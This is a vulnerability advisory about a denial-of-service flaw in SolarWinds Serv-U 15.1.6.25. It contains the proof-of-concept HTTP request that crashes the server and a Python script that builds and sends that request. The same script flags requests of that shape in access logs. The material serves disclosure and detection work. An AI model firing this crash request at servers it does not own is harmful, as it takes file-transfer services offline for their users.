Reported Date
January 8, 2018
Vendor
SolarWinds
Systems Affected
Serv-U 15.1.6.25
Summary
A denial-of-service vulnerability in SolarWinds Serv-U 15.1.6.25 allows an authenticated user to crash the application (with a NULL pointer dereference) via a specially crafted URL beginning with the /Web%20Client/ substring.
Vendor Status
The vendor has been notified of this vulnerability, and has patched the software as of version 15.1.6 HFv1.
Exploit Availability
An authenticated user can request a specially crafted URL from the Serv-U MFT server that will result in a NULL pointer dereference. By changing the Login.xml string in the URL of an authentication request to an arbitrary value, an attacker can cause the application to crash. An ordinary login request is shown below:

POST /Web%20Client/Login.xml?Command=Login&Sync=1514397954014 HTTP/1.1
Host: 127.0.0.1
Connection: close
…omitted for brevity…
Cookie: multitransbubbletip=false; multitrans=0; SURememberMe=true; SUUserId=testuser2; killmenothing; SULang=en%2CUS

user=testuser&pword=password&viewshare=&language=en%2CUS&
In this proof of concept, Login.xml was replaced with the string crash, as shown below:

POST /Web%20Client/crash?Command=Login&Sync=1514397954014 HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 59
…omitted for brevity…
Cookie: multitransbubbletip=false; multitrans=0; SURememberMe=true; SUUserId=testuser2; killmenothing; SULang=en%2CUS

user=testuser&pword=password&viewshare=&language=en%2CUS&
The Serv-U tray immediately displayed a pop-up notification stating that the Serv-U MFT server was offline. Shortly thereafter, an error message was displayed within the Serv-U Management Console. The Management Console was otherwise unresponsive, and the Serv-U MFT server had to be manually restarted following the crash; a single request from any valid account is therefore enough to take the service down until an administrator intervenes.
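The following Python script is an added example, not Bishop Fox's proof-of-concept code or anything shipped by SolarWinds. It reproduces the shape of the request above (the only change between a normal login and the crash is the final path segment under /Web%20Client/) and, for defenders, classifies request targets from access-log lines so that a Command=Login request whose resource is not Login.xml can be flagged. The port (80, plain HTTP), the log format and the log lines are assumptions constructed for illustration; only run the send function against a Serv-U instance you own, since a successful request knocks the server offline.

```python
"""Added example: build the Serv-U /Web%20Client/ login request from the advisory
and flag PoC-shaped requests in access logs. Not the advisory's own code."""
import re
import socket
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

WEB_CLIENT_PREFIX = "/Web%20Client/"
LOGIN_RESOURCE = "Login.xml"        # the legitimate login endpoint from the advisory


def build_login_request(host: str, resource: str, user: str, pword: str,
                        sync: int = 1514397954014) -> bytes:
    """Return a raw HTTP/1.1 POST in the shape of the advisory's request.

    `resource` is the final path segment under /Web%20Client/: "Login.xml" for an
    ordinary login, any other value (the advisory used "crash") for the PoC.
    The Cookie header from the advisory is omitted; the body and query are kept.
    """
    body = f"user={user}&pword={pword}&viewshare=&language=en%2CUS&"
    target = f"{WEB_CLIENT_PREFIX}{resource}?Command=Login&Sync={sync}"
    lines = [
        f"POST {target} HTTP/1.1",
        f"Host: {host}",
        "Connection: close",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",
        "",
        body,
    ]
    return "\r\n".join(lines).encode("ascii")


def send_request(host: str, port: int, request: bytes,
                 timeout: float = 5.0) -> Optional[bytes]:
    """Send a raw request and return the response, or None if the server refused
    the connection or closed it without answering (what a crashed Serv-U does)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(request)
            chunks = []
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks) or None
    except OSError:
        return None


def classify_request_target(target: str) -> str:
    """Classify a request-target (path plus query) seen at the Serv-U web front end.

    "login"      - /Web%20Client/Login.xml with Command=Login (normal login)
    "suspicious" - any other resource under /Web%20Client/ with Command=Login,
                   which is exactly the substitution the PoC performs
    "other"      - everything else
    """
    parts = urlsplit(target)
    if not parts.path.startswith(WEB_CLIENT_PREFIX):
        return "other"
    if parse_qs(parts.query).get("Command") != ["Login"]:
        return "other"
    resource = parts.path[len(WEB_CLIENT_PREFIX):]
    return "login" if resource == LOGIN_RESOURCE else "suspicious"


# Constructed access-log lines (common log format from a hypothetical reverse proxy).
SAMPLE_LOG = """\
10.0.0.5 - - [08/Jan/2018:10:00:01 -0500] "POST /Web%20Client/Login.xml?Command=Login&Sync=1514397954014 HTTP/1.1" 200 512
10.0.0.5 - - [08/Jan/2018:10:00:07 -0500] "GET /Web%20Client/ HTTP/1.1" 200 8192
10.0.0.9 - - [08/Jan/2018:10:00:12 -0500] "POST /Web%20Client/crash?Command=Login&Sync=1514397954014 HTTP/1.1" - -
"""

_REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/1\.[01]"')


def suspicious_lines(log_text: str) -> List[str]:
    """Return the log lines whose request target matches the PoC shape."""
    hits = []
    for line in log_text.splitlines():
        match = _REQUEST_LINE.search(line)
        if match and classify_request_target(match.group(1)) == "suspicious":
            hits.append(line)
    return hits


if __name__ == "__main__":
    for hit in suspicious_lines(SAMPLE_LOG):
        print("PoC-shaped request:", hit)
    # Live check against your own test instance only (assumed 127.0.0.1:80).
    req = build_login_request("127.0.0.1", "crash", "testuser", "password")
    print("server answered" if send_request("127.0.0.1", 80, req) else "no response / offline")
```

The classifier deliberately keys on the Command=Login query parameter rather than on a fixed list of resource names, because the advisory establishes only that Login.xml is the expected resource for a login request; any other resource paired with that command is the PoC's signature. Because the server stops answering after one hit, pairing this log check with a service-availability alert gives responders both the trigger and the outage in the same window.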
Researcher
Baker Hamilton, MD, MMSc of Bishop Fox
For Reference